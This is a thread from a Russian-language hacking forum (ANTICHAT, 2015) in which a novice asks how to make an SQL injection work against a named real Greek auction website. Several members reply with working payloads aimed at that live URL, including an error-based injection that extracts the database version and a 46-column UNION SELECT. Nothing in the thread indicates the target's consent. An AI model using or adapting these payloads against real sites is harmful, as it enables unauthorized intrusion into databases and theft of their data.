ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
10.08.2015, 02:24
|
|
Новичок
Регистрация: 02.08.2015
Сообщений: 2
Провел на форуме:
685
Репутация:
0
|
|
На одном сайте не могу внедрить SQL-инъекцию, пишу "-" или "." перед значением id=, не пускает ошибка Error 404 - page not found и все. Посоветуйте чего, а то я новичок в этом деле...
Так не пускет:
Код:
http://www.texnitesonline.gr/controller/auction/preview.php?id=-18961' union all select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46 -- -
|
|
|
10.08.2015, 10:43
|
|
Новичок
Регистрация: 15.05.2010
Сообщений: 0
Провел на форуме:
29
Репутация:
0
|
|
Здесь нет sql иньекции
|
|
|
|
10.08.2015, 10:53
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435
Репутация:
1013
|
|
Сообщение от Dondo
↑
На одном сайте не могу внедрить SQL-инъекцию, пишу "-" или "." перед значением id=, не пускает ошибка Error 404 - page not found и все. Посоветуйте чего, а то я новичок в этом деле...
Так не пускет:
Код:
http://www.texnitesonline.gr/controller/auction/preview.php?id=-18961' union all select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46 -- -
попробуйте любые другие функции, чтобы сделать условие ложным. and 1=0 union select
div 0 union select
|
|
|
|
10.08.2015, 11:11
|
|
Постоянный
Регистрация: 30.05.2012
Сообщений: 600
Провел на форуме:
132418
Репутация:
652
|
|
Инъекция есть, не пугайтесь редиректов и ошибок.
|
|
|
|
10.08.2015, 11:17
|
|
Новичок
Регистрация: 15.05.2010
Сообщений: 0
Провел на форуме:
29
Репутация:
0
|
|
Код:
http://www.texnitesonline.gr/controller/auction/preview.php?id=18961' AND (SELECT 1 FROM(SELECT COUNT(*),CONCAT(version(),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '1'='1
Извините, за мою невнимательность. Вот раскрученая |
|
|
|
10.08.2015, 15:35
|
|
Новичок
Регистрация: 02.08.2015
Сообщений: 2
Провел на форуме:
685
Репутация:
0
|
|
Сообщение от ocheretko
↑
Код:
http://www.texnitesonline.gr/controller/auction/preview.php?id=18961' AND (SELECT 1 FROM(SELECT COUNT(*),CONCAT(version(),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '1'='1
Извините, за мою невнимательность. Вот раскрученая
Спасибо!
|
|
|
|
13.08.2015, 17:30
|
|
Познающий
Регистрация: 31.01.2007
Сообщений: 88
Провел на форуме:
631013
Репутация:
453
|
|
Ну и если кому-то по эстетическим причинам не нравится error based, то так оно тоже вполне себе работает
Код:
http://www.texnitesonline.gr/controller/auction/preview.php?id=18963' limit 0 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,version(),15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46 -- 1
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
